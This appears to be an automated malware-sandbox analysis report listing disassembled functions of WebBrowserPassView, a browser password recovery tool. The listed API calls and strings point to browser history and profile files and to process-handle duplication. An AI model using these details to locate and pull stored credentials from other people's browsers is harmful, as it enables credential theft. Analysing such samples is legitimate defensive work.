Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416854
Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416865

memcmp.MSVCRT ref: 004169BD

Strings

$, xrefs: 00416998
8, xrefs: 0041698A

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: AddressProc$memcmp
String ID: $$8
API String ID: 2808797137-435121686
Opcode ID: c8c4ce928d5e3aac457400f17cb603f47478cc1e293077f961af05addd09d54a
Instruction ID: d6b0cb39fe6b11ebd3f8115ad541cfda54a2ea99a1e62a8371d336f42745e82c
Opcode Fuzzy Hash: c8c4ce928d5e3aac457400f17cb603f47478cc1e293077f961af05addd09d54a
Instruction Fuzzy Hash: CB3183B1A00219AFCF10DF95CD80AEEB7B8BF48354F11455AE811B3241D778ED848F65

Uniqueness

Uniqueness Score: -1.00%

Function 0040C210 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040BD7C: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040BDF1
Part of subcall function 0040BD7C: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040BE10
Part of subcall function 0040BD7C: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040BE1D
Part of subcall function 0040BD7C: GetFileSize.KERNEL32(?,00000000), ref: 0040BE32
Part of subcall function 0040BD7C: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040BE5C
Part of subcall function 0040BD7C: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040BE71
Part of subcall function 0040BD7C: WriteFile.KERNELBASE(00000000,00000000,00000104,0040C401,00000000), ref: 0040BE8C
Part of subcall function 0040BD7C: UnmapViewOfFile.KERNEL32(00000000), ref: 0040BE93
Part of subcall function 0040BD7C: FindCloseChangeNotification.KERNELBASE(?), ref: 0040BE9C

FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040C401,000000FF,?,00000104,00000000), ref: 0040C2E0

Part of subcall function 0040C009: memset.MSVCRT ref: 0040C0DE
Part of subcall function 0040C009: wcschr.MSVCRT ref: 0040C116
Part of subcall function 0040C009: memcpy.MSVCRT ref: 0040C14A

DeleteFileW.KERNELBASE(?,?,0040C401,000000FF,?,00000104,00000000), ref: 0040C301
CloseHandle.KERNEL32(000000FF,?,0040C401,000000FF,?,00000104,00000000), ref: 0040C328

Part of subcall function 0040BED3: memset.MSVCRT ref: 0040BF1B
Part of subcall function 0040BED3: _snwprintf.MSVCRT ref: 0040BFB5
Part of subcall function 0040BED3: free.MSVCRT(000000FF,?,000000FF,00000000,00000104,74D0F560), ref: 0040BFE9

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
String ID:
API String ID: 3931293568-0
Opcode ID: b5aaa30312d5fcc67f85845942f74e89b96bccb2180b41cf2d59821ccef51685
Instruction ID: 93ccc22cef0f4177ecd56315f2e6d26b449d926f0b5ad61dc23816b56d629bd5
Opcode Fuzzy Hash: b5aaa30312d5fcc67f85845942f74e89b96bccb2180b41cf2d59821ccef51685
Instruction Fuzzy Hash: D13106B1C00628DBCF60DBA5CC856CEF7B8EF54314F2042ABA518B31A1DB756E958F58

Uniqueness

Uniqueness Score: -1.00%

Function 00412DB7 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00412F8E: memset.MSVCRT ref: 00412FAA
Part of subcall function 00412F8E: memset.MSVCRT ref: 00412FBF
Part of subcall function 00412F8E: wcscat.MSVCRT ref: 00412FE8
Part of subcall function 00412F8E: wcscat.MSVCRT ref: 00413011

memset.MSVCRT ref: 00412DF6

Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314

Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B

Part of subcall function 0040AEF6: wcslen.MSVCRT ref: 0040AF08
Part of subcall function 0040AEF6: free.MSVCRT(?,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF2E
Part of subcall function 0040AEF6: free.MSVCRT(?,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF51
Part of subcall function 0040AEF6: memcpy.MSVCRT ref: 0040AF75

Strings

history.dat, xrefs: 00412DFF
places.sqlite, xrefs: 00412E3F

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
String ID: history.dat$places.sqlite
API String ID: 2641622041-467022611
Opcode ID: 5ce66e48bdc4920442f683e6e5456c270c12768b353b56623e071be1669025bb
Instruction ID: 0913544ad1c32b840834749151f10e29a01f1c6a2781536613fb288058adf295
Opcode Fuzzy Hash: 5ce66e48bdc4920442f683e6e5456c270c12768b353b56623e071be1669025bb
Instruction Fuzzy Hash: BE115E72940219A6CB10FA66CD46ACE77BC9F40354F1101B6A914F61C2EB3CAF95CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00419544 Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004194C7: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 004194E8
Part of subcall function 004194C7: GetLastError.KERNEL32 ref: 004194F9
Part of subcall function 004194C7: GetLastError.KERNEL32 ref: 004194FF

ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00419574
GetLastError.KERNEL32 ref: 0041957E

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ErrorLast$File$PointerRead
String ID:
API String ID: 839530781-0
Opcode ID: 2f4b618ee86a0e133fb5120afe2878c9d32770f55e3633c820ca502eedbfd477
Instruction ID: 11002ccd72b8a74f474208f9e9940f6dfa3330b5e17921820ced85d813cc92d2
Opcode Fuzzy Hash: 2f4b618ee86a0e133fb5120afe2878c9d32770f55e3633c820ca502eedbfd477
Instruction Fuzzy Hash: E401AD33208208BFEB119FA5DC41BEA3B6DEB45360F100432F908E6240D325ED9487ED

Uniqueness

Uniqueness Score: -1.00%

Function 00406DC5 Relevance: 4.5, APIs: 3, Instructions: 47COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406DEB

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 24d7101f2396b300d47b12eeea5d1e2d418f134ac1a095ce5a52484e7998c81a
Instruction ID: 34603109410cef2129f755603dd0e4cc8eb2e8e4e911a152f6c684bad516c156
Opcode Fuzzy Hash: 24d7101f2396b300d47b12eeea5d1e2d418f134ac1a095ce5a52484e7998c81a
Instruction Fuzzy Hash: 5701A7B7D04308A9FB24E7A5DD8AB9A73AC9F10318F1104BBA705E21C3F778DA448659

Uniqueness

Uniqueness Score: -1.00%

Function 0040C681 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

Strings

index.dat, xrefs: 0040C6E5
*.*, xrefs: 0040C6AC

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID: *.*$index.dat
API String ID: 1974802433-2863569691
Opcode ID: 0124a788923a264a0f71dca03e4d7c55c72886d07455ff904c63946b470e1fd6
Instruction ID: b35fd175f81657b3a82865a2fc917a928efaf22c6e287d3be843c0a7ee8e476f
Opcode Fuzzy Hash: 0124a788923a264a0f71dca03e4d7c55c72886d07455ff904c63946b470e1fd6
Instruction Fuzzy Hash: 41015671801568D5DB20E761DC426DE73BC9F04314F5056B7A819F21D2E7389F858F9D

Uniqueness

Uniqueness Score: -1.00%

Function 004194C7 Relevance: 4.5, APIs: 3, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 004194E8
GetLastError.KERNEL32 ref: 004194F9
GetLastError.KERNEL32 ref: 004194FF

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 1fa7c2f3d529686f49671a40cca17831ab9a59f419c89db5340c4276b833b879
Instruction ID: 1998d2df4d7dc22cf6efa6b8a4ec31ccf4d22c2bb1f0502cb4b25adc0a96311e
Opcode Fuzzy Hash: 1fa7c2f3d529686f49671a40cca17831ab9a59f419c89db5340c4276b833b879
Instruction Fuzzy Hash: 63F03072514115FBCB019F74DC109AA7AE9EB05360B144736F822E6294E730ED419A94

Uniqueness

Uniqueness Score: -1.00%

Function 0040A004 Relevance: 4.5, APIs: 3, Instructions: 26COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,?), ref: 0040A01B
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040A02D
GetTempFileNameW.KERNELBASE(?,004011DE,00000000,?), ref: 0040A044

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Temp$DirectoryFileNamePathWindows
String ID:
API String ID: 1125800050-0
Opcode ID: 0ac39e12c10960c6ae965ccf36b1fe6417054cdce8b353a9a0186d0b00836cfd
Instruction ID: fdba6f523a0edeb98830ec5a6e2b40949d18461f6cb5c57ccf156b0356e15e7f
Opcode Fuzzy Hash: 0ac39e12c10960c6ae965ccf36b1fe6417054cdce8b353a9a0186d0b00836cfd
Instruction Fuzzy Hash: 68E0927A500319E7DB605B50EC4CFC737BCEF45304F000070B945E2150E634AA888BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409FB3 Relevance: 3.8, APIs: 3, Instructions: 38COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00409FCF
memcpy.MSVCRT ref: 00409FE7
free.MSVCRT(00000000,00000000,?,0040B018,00000002,?,00000000,?,0040B34B,00000000,?,00000000), ref: 00409FF0

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: freemallocmemcpy
String ID:
API String ID: 3056473165-0
Opcode ID: 9398946df9da7633900af1d4d8dee9f6475252f93bc7d5b1a1eb9b1b3952e123
Instruction ID: 3fa6d8dc34f6a2d7cc02f22bfce68f49e3ca57b08464e0138f2fbe8277461859
Opcode Fuzzy Hash: 9398946df9da7633900af1d4d8dee9f6475252f93bc7d5b1a1eb9b1b3952e123
Instruction Fuzzy Hash: B3F082B26052269FD708AF75A98185BB39DEF55364B12483FF404E7282DB389C50C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00415974 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

Part of subcall function 0041599C: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 004159BC
Part of subcall function 0041599C: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004159C8
Part of subcall function 0041599C: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004159D4
Part of subcall function 0041599C: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004159E0
Part of subcall function 0041599C: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004159EC

K32GetModuleFileNameExW.KERNEL32(00000000,00000000,lXA,00000104,0041586C,00000000,?), ref: 00415993

Strings

lXA, xrefs: 00415989

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: AddressProc$FileModuleName
String ID: lXA
API String ID: 3859505661-3442822412
Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction ID: fee6c053b5955f725308cf381fe1744ee842b03cbd95df917c5b16bd142f82aa
Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction Fuzzy Hash: B4D0C9B2225711EBE621EA748C01BDBA7D46B84720F009C1AB191D6190D764D854565A

Uniqueness

Uniqueness Score: -1.00%

Function 0043917D Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

d, xrefs: 0043933D

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: a76db7e4c54f4a7d8ce000c0450a4b0bfb47c91072e90eb52a1bbb69a31df567
Instruction ID: 8f6596d4f93993bca5fedc02ea909bb24cc5f22f60e220bd561afb4714264618
Opcode Fuzzy Hash: a76db7e4c54f4a7d8ce000c0450a4b0bfb47c91072e90eb52a1bbb69a31df567
Instruction Fuzzy Hash: 3781AD716083029BDB10EF16D881A6F77E0AF89358F14092FF89497291D7B8DD45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00420E2A Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00420ED8

Strings

BINARY, xrefs: 00420E36

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset
String ID: BINARY
API String ID: 2221118986-907554435
Opcode ID: 60e0f8e27434ffc42e071fb85a3f10dba614baad71011669f295a7aba79e687e
Instruction ID: 26b79014cfc78d58b95db9363976e6c90bc85ae6725c162ac4ac0b56dde6da67
Opcode Fuzzy Hash: 60e0f8e27434ffc42e071fb85a3f10dba614baad71011669f295a7aba79e687e
Instruction Fuzzy Hash: 4151AD71A043259FDB21CF28E581BAB7BE4AF08350F55446AF849DB342E778D980CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00410042 Relevance: 3.1, APIs: 2, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 0040E814: ??2@YAPAXI@Z.MSVCRT ref: 0040E835
Part of subcall function 0040E814: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FC

GetStdHandle.KERNEL32(000000F5,?,004122A5,00000000,00000000,?,00000000,00000000,00000000), ref: 00410077
FindCloseChangeNotification.KERNELBASE(00000000,?,004122A5,00000000,00000000,?,00000000,00000000,00000000), ref: 0041019B

Part of subcall function 00409C9B: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,00410072,00000000,?,004122A5,00000000,00000000,?,00000000,00000000), ref: 00409CAD

Part of subcall function 00409CFB: GetLastError.KERNEL32(00000000,?,004101B0,00000000,?,004122A5,00000000,00000000,?,00000000,00000000,00000000), ref: 00409D0F
Part of subcall function 00409CFB: _snwprintf.MSVCRT ref: 00409D3C
Part of subcall function 00409CFB: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409D55

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
String ID:
API String ID: 1161345128-0
Opcode ID: c352156c60bf5e8969b3410faff8cba1e1f857f4dc2c43362582496339407a16
Instruction ID: 773294f2793927884dd3d35b59f4cb20d409429543e063566a68095ef13c6261
Opcode Fuzzy Hash: c352156c60bf5e8969b3410faff8cba1e1f857f4dc2c43362582496339407a16
Instruction Fuzzy Hash: 10417F31A00200FFCB219F69C885A9E77F6AF49714F21416FF446A7291CBBD9EC0DA59

Uniqueness

Uniqueness Score: -1.00%

Function 004121DB Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00412228

Strings

/stext, xrefs: 00412223

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _wcsicmp
String ID: /stext
API String ID: 2081463915-3817206916
Opcode ID: faacc565551467a7f9fecfe8be6c9a25ffd216349f1a930335e294746595b54b
Instruction ID: 2d0fa8a023af8a82833a79c8a9a2b375c4b98090195f1c385c961b9dc0378c10
Opcode Fuzzy Hash: faacc565551467a7f9fecfe8be6c9a25ffd216349f1a930335e294746595b54b
Instruction Fuzzy Hash: C0218830B00605AFD704EF66C981BDDF7B9FF94304F10016AA419E7342DBB9AD618B99

Uniqueness

Uniqueness Score: -1.00%

Function 00413E30 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00413E53

Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314

Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B

Part of subcall function 004010A6: memset.MSVCRT ref: 004010D3
Part of subcall function 004010A6: wcsrchr.MSVCRT ref: 004010EF
Part of subcall function 004010A6: memset.MSVCRT ref: 0040110D
Part of subcall function 004010A6: memset.MSVCRT ref: 004011AC
Part of subcall function 004010A6: CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 004011C3

Strings

FA, xrefs: 00413E30

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
String ID: FA
API String ID: 1828521557-1137249561
Opcode ID: dbe4fe885372198836d1553c0ade92ba4046f6e660ffa4c2721431e6b8765f59
Instruction ID: 1b9fe372a81af7ef4fcc301b0704f8a61b654f984bb2216e8f14dd72d3cafccc
Opcode Fuzzy Hash: dbe4fe885372198836d1553c0ade92ba4046f6e660ffa4c2721431e6b8765f59
Instruction Fuzzy Hash: CB11ACB194021D79EB20F761DC4AFDB776CDF50314F04047BB518A51C2E6B89AD44669

Uniqueness

Uniqueness Score: -1.00%

Function 0040D0D4 Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 00409C82: CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94

GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040118B,?,?,?,?,000003FF), ref: 0040D0F2

Part of subcall function 0040B5F5: ??2@YAPAXI@Z.MSVCRT ref: 0040B5FE

Part of subcall function 0040A8AE: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5

Part of subcall function 0040B170: MultiByteToWideChar.KERNEL32(0040D143,00000000,000000FF,?,00000000,00000000,?,00000000,?,0040D143,?,000000FF,0000FDE9), ref: 0040B189
Part of subcall function 0040B170: MultiByteToWideChar.KERNEL32(0040D143,00000000,000000FF,?,00000000,00000000,?,0040D143,?,000000FF,0000FDE9), ref: 0040B1AE

FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040D146

Part of subcall function 0040B671: ??3@YAXPAX@Z.MSVCRT ref: 0040B678

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
